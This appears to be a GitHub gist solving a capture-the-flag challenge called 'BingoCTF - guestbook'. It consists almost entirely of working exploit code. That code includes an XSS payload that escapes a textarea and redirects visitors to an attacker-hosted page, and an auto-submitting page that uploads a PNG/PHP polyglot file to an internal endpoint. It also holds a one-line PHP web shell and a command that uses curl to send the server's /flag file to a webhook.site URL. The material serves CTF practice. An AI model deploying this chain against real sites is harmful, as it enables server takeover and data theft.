- Generate payload with
gen_payload.php
- Put
exploit1.html
,exploit2.html
, and generatedpayload.bin
on your Web server - Post
</textarea><script nonce="script">if(location.href.indexOf(`web1.bingo`)===-1)location=`http://[IP address]/exploit1.html`</script><textarea>
- Fix filename in
exploit2.html
frompayload_0.6719151792598002.php
topayload_(value shown in logs).php
- Post
</textarea><script nonce="script">if(location.href.indexOf(`web1.bingo`)===-1)location=`http://[IP address]/exploit2.html`</script><textarea>
Last active
March 17, 2021 19:13
-
-
Save st98/98a05b400bf7e45b3c31c9019daf5035 to your computer and use it in GitHub Desktop.
BingoCTF - guestbook
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php shell_exec($_GET['cmd']); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<form method="POST" enctype="multipart/form-data" action="http://private/upload.php" id="form"> | |
<input type="text" name="submit" value="ok"> | |
<input type="file" name="fileToUpload" id="up"> | |
<input type="submit" id="go"> | |
</form> | |
<script> | |
(async () => { | |
const form = document.getElementById('form'); | |
const up = document.getElementById('up'); | |
const content = await fetch('/payload.bin').then(resp => resp.blob()); | |
const blob = new Blob([content], { type: "image/png"}); | |
const filename = 'payload_' + Math.random() + '.php'; | |
await fetch('/log.php?filename=' + filename); | |
const file = new File([blob], filename); | |
const dt = new DataTransfer(); | |
dt.items.add(file); | |
const list = dt.files; | |
up.files = list; | |
const go = document.getElementById('go'); | |
go.click(); | |
})(); | |
</script> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<script> | |
location.href = "http://private/uploads/payload_0.6719151792598002.php?cmd=" + encodeURIComponent('curl "https://webhook.site/e9ad957a-4480-44ff-b428-3324b77c15f0" -F a=@/flag'); | |
</script> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
$a = file_get_contents('base.png'); | |
$b = file_get_contents('base.php'); | |
file_put_contents('payload.bin', substr($a, 0, 100) . $b); |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment